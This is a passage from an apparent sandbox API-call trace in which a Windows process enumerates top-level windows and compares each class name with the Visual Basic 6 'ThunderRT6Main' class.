returned 0xd6c [0231.717] GetWindow (hWnd=0x2016a, uCmd=0x2) returned 0x3011e [0231.717] GetClassNameA (in: hWnd=0x3011e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="mrs_Tft_") returned 8 [0231.717] lstrcmpA (lpString1="mrs_Tft_", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x3011e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4b0 [0231.717] GetWindow (hWnd=0x3011e, uCmd=0x2) returned 0x20202 [0231.717] GetClassNameA (in: hWnd=0x20202, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.717] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x20202, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4b0 [0231.717] GetWindow (hWnd=0x20202, uCmd=0x2) returned 0x400ac [0231.717] GetClassNameA (in: hWnd=0x400ac, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="NswClaimswindow") returned 15 [0231.717] lstrcmpA (lpString1="NswClaimswindow", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x560 [0231.717] GetWindow (hWnd=0x400ac, uCmd=0x2) returned 0x20104 [0231.717] GetClassNameA (in: hWnd=0x20104, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.717] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.717] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x560 [0231.718] GetWindow (hWnd=0x20104, uCmd=0x2) returned 0x3009c [0231.718] GetClassNameA (in: hWnd=0x3009c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Planehospitalcls") returned 16 [0231.718] lstrcmpA (lpString1="Planehospitalcls", lpString2="ThunderRT6Main") returned -1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x3009c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x554 [0231.718] GetWindow (hWnd=0x3009c, uCmd=0x2) returned 0x300f0 [0231.718] GetClassNameA (in: hWnd=0x300f0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.718] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x300f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x554 [0231.718] GetWindow (hWnd=0x300f0, uCmd=0x2) returned 0x1022e [0231.718] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0231.718] lstrcmpA (lpString1="Windows.UI.Core.CoreWindow", lpString2="ThunderRT6Main") returned 1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd5c [0231.718] GetWindow (hWnd=0x1022e, uCmd=0x2) returned 0x10230 [0231.718] GetClassNameA (in: hWnd=0x10230, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.718] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd5c [0231.718] GetWindow (hWnd=0x10230, uCmd=0x2) returned 0x1022c [0231.718] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0231.718] lstrcmpA (lpString1="BluetoothNotificationAreaIconWindowClass", lpString2="ThunderRT6Main") returned -1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0231.718] GetWindow (hWnd=0x1022c, uCmd=0x2) returned 0x1021c [0231.718] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="PNIHiddenWnd") returned 12 [0231.718] lstrcmpA (lpString1="PNIHiddenWnd", lpString2="ThunderRT6Main") returned -1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0231.718] GetWindow (hWnd=0x1021c, uCmd=0x2) returned 0x10218 [0231.718] GetClassNameA (in: hWnd=0x10218, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.718] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.718] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0231.718] GetWindow (hWnd=0x10218, uCmd=0x2) returned 0x10214 [0231.719] GetClassNameA (in: hWnd=0x10214, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.719] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0231.719] GetWindow (hWnd=0x10214, uCmd=0x2) returned 0x10216 [0231.719] GetClassNameA (in: hWnd=0x10216, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.719] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0231.719] GetWindow (hWnd=0x10216, uCmd=0x2) returned 0x10208 [0231.719] GetClassNameA (in: hWnd=0x10208, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ATL:00007FFCF8E5E130") returned 20 [0231.719] lstrcmpA (lpString1="ATL:00007FFCF8E5E130", lpString2="ThunderRT6Main") returned -1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0231.719] GetWindow (hWnd=0x10208, uCmd=0x2) returned 0x1020a [0231.719] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.719] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0231.719] GetWindow (hWnd=0x1020a, uCmd=0x2) returned 0x101ea [0231.719] GetClassNameA (in: hWnd=0x101ea, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="SystemTray_Main") returned 15 [0231.719] lstrcmpA (lpString1="SystemTray_Main", lpString2="ThunderRT6Main") returned -1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0231.719] GetWindow (hWnd=0x101ea, uCmd=0x2) returned 0x101e8 [0231.719] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0231.719] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.719] GetWindow (hWnd=0x101e8, uCmd=0x2) returned 0x101e2 [0231.719] GetClassNameA (in: hWnd=0x101e2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.719] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.719] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0231.719] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101e4 [0231.719] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.720] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xccc [0231.720] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x101ca [0231.720] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.720] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc34 [0231.720] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x101ce [0231.720] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.720] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc34 [0231.720] GetWindow (hWnd=0x101ce, uCmd=0x2) returned 0x10166 [0231.720] GetClassNameA (in: hWnd=0x10166, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="TabletModeCoverWindow") returned 21 [0231.720] lstrcmpA (lpString1="TabletModeCoverWindow", lpString2="ThunderRT6Main") returned -1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.720] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x201dc [0231.720] GetClassNameA (in: hWnd=0x201dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.720] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x201dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.720] GetWindow (hWnd=0x201dc, uCmd=0x2) returned 0x201da [0231.720] GetClassNameA (in: hWnd=0x201da, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.720] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.720] GetWindowThreadProcessId (in: hWnd=0x201da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.720] GetWindow (hWnd=0x201da, uCmd=0x2) returned 0x1015e [0231.720] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0231.720] lstrcmpA (lpString1="DummyDWMListenerWindow", lpString2="ThunderRT6Main") returned -1 [0231.725] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.725] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x10158 [0231.725] GetClassNameA (in: hWnd=0x10158, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0231.725] lstrcmpA (lpString1="EdgeUiInputTopWndClass", lpString2="ThunderRT6Main") returned -1 [0231.725] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.725] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x1013e [0231.725] GetClassNameA (in: hWnd=0x1013e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0231.725] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0231.725] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.725] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x200ca [0231.725] GetClassNameA (in: hWnd=0x200ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0231.726] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x200ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa08 [0231.726] GetWindow (hWnd=0x200ca, uCmd=0x2) returned 0x10134 [0231.726] GetClassNameA (in: hWnd=0x10134, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0231.726] lstrcmpA (lpString1="ApplicationManager_DesktopShellWindow", lpString2="ThunderRT6Main") returned -1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.726] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10130 [0231.726] GetClassNameA (in: hWnd=0x10130, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.726] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.726] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10132 [0231.726] GetClassNameA (in: hWnd=0x10132, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.726] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.726] GetWindow (hWnd=0x10132, uCmd=0x2) returned 0x10128 [0231.726] GetClassNameA (in: hWnd=0x10128, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0231.726] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.726] GetWindow (hWnd=0x10128, uCmd=0x2) returned 0x10124 [0231.726] GetClassNameA (in: hWnd=0x10124, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.726] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.726] GetWindow (hWnd=0x10124, uCmd=0x2) returned 0x10122 [0231.726] GetClassNameA (in: hWnd=0x10122, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.726] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.726] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10118 [0231.726] GetClassNameA (in: hWnd=0x10118, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0231.726] lstrcmpA (lpString1="PushNotificationsPowerManagement", lpString2="ThunderRT6Main") returned -1 [0231.726] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0231.727] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x1011a [0231.727] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.727] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x814 [0231.727] GetWindow (hWnd=0x1011a, uCmd=0x2) returned 0x10110 [0231.727] GetClassNameA (in: hWnd=0x10110, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.727] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x81c [0231.727] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x10112 [0231.727] GetClassNameA (in: hWnd=0x10112, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.727] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x81c [0231.727] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10108 [0231.727] GetClassNameA (in: hWnd=0x10108, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0231.727] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.727] GetWindow (hWnd=0x10108, uCmd=0x2) returned 0x100f6 [0231.727] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.727] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.727] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x20052 [0231.727] GetClassNameA (in: hWnd=0x20052, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0231.727] lstrcmpA (lpString1="MS_WebcheckMonitor", lpString2="ThunderRT6Main") returned -1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x20052, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd34 [0231.727] GetWindow (hWnd=0x20052, uCmd=0x2) returned 0x100c2 [0231.727] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0231.727] lstrcmpA (lpString1="NotifyIconOverflowWindow", lpString2="ThunderRT6Main") returned -1 [0231.727] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.727] GetWindow (hWnd=0x100c2, uCmd=0x2) returned 0x2003a [0231.727] GetClassNameA (in: hWnd=0x2003a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0231.727] lstrcmpA (lpString1="COMTASKSWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x2003a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4bc [0231.728] GetWindow (hWnd=0x2003a, uCmd=0x2) returned 0x20018 [0231.728] GetClassNameA (in: hWnd=0x20018, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DDEMLEvent") returned 10 [0231.728] lstrcmpA (lpString1="DDEMLEvent", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.728] GetWindow (hWnd=0x20018, uCmd=0x2) returned 0x2001c [0231.728] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="DDEMLMom") returned 8 [0231.728] lstrcmpA (lpString1="DDEMLMom", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.728] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x2001a [0231.728] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.728] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.728] GetWindow (hWnd=0x2001a, uCmd=0x2) returned 0x1003e [0231.728] GetClassNameA (in: hWnd=0x1003e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Dwm") returned 3 [0231.728] lstrcmpA (lpString1="Dwm", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x360 [0231.728] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1008e [0231.728] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="CicLoaderWndClass") returned 17 [0231.728] lstrcmpA (lpString1="CicLoaderWndClass", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x598 [0231.728] GetWindow (hWnd=0x1008e, uCmd=0x2) returned 0x1010a [0231.728] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Progman") returned 7 [0231.728] lstrcmpA (lpString1="Progman", lpString2="ThunderRT6Main") returned -1 [0231.728] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.728] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x0 [0231.728] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d3a4293a90 [0231.730] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a4293a90) [0232.002] GetCurrentThreadId () returned 0x1378 [0232.002] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0232.002] GetDesktopWindow () returned 0x10010 [0232.002] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x10176 [0232.002] GetClassNameA (in: hWnd=0x10176, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ForegroundStaging") returned 17 [0232.002] lstrcmpA (lpString1="ForegroundStaging", lpString2="ThunderRT6Main") returned -1 [0232.002] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xacc [0232.002] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10178 [0232.003] GetClassNameA (in: hWnd=0x10178, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.003] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xacc [0232.003] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x10142 [0232.003] GetClassNameA (in: hWnd=0x10142, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ForegroundStaging") returned 17 [0232.003] lstrcmpA (lpString1="ForegroundStaging", lpString2="ThunderRT6Main") returned -1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0232.003] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x100e6 [0232.003] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.003] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.003] GetWindow (hWnd=0x100e6, uCmd=0x2) returned 0x100e2 [0232.003] GetClassNameA (in: hWnd=0x100e2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.003] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.003] GetWindow (hWnd=0x100e2, uCmd=0x2) returned 0x100dc [0232.003] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.003] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.003] GetWindow (hWnd=0x100dc, uCmd=0x2) returned 0x100d8 [0232.003] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.003] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.003] GetWindowThreadProcessId (in: hWnd=0x100d8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x100d8, uCmd=0x2) returned 0x100c0 [0232.004] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.004] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x100c0, uCmd=0x2) returned 0x100b8 [0232.004] GetClassNameA (in: hWnd=0x100b8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.004] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x100b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x100b8, uCmd=0x2) returned 0x100a8 [0232.004] GetClassNameA (in: hWnd=0x100a8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.004] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x100a8, uCmd=0x2) returned 0x102fc [0232.004] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="HardwareMonitorWindowClass") returned 26 [0232.004] lstrcmpA (lpString1="HardwareMonitorWindowClass", lpString2="ThunderRT6Main") returned -1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x102fc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.004] GetWindowLongA (hWnd=0x102fc, nIndex=-16) returned -2080374784 [0232.004] GetWindowLongPtrA (hWnd=0x102fc, nIndex=-6) returned 0x0 [0232.004] GetWindowLongPtrA (hWnd=0x102fc, nIndex=-6) returned 0x0 [0232.004] GetWindow (hWnd=0x102fc, uCmd=0x2) returned 0x10106 [0232.004] GetClassNameA (in: hWnd=0x10106, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0232.004] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x10106, uCmd=0x2) returned 0x100a2 [0232.004] GetClassNameA (in: hWnd=0x100a2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.004] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x100a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.004] GetWindow (hWnd=0x100a2, uCmd=0x2) returned 0x10100 [0232.004] GetClassNameA (in: hWnd=0x10100, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.004] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.004] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.005] GetWindow (hWnd=0x10100, uCmd=0x2) returned 0x100f4 [0232.005] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") 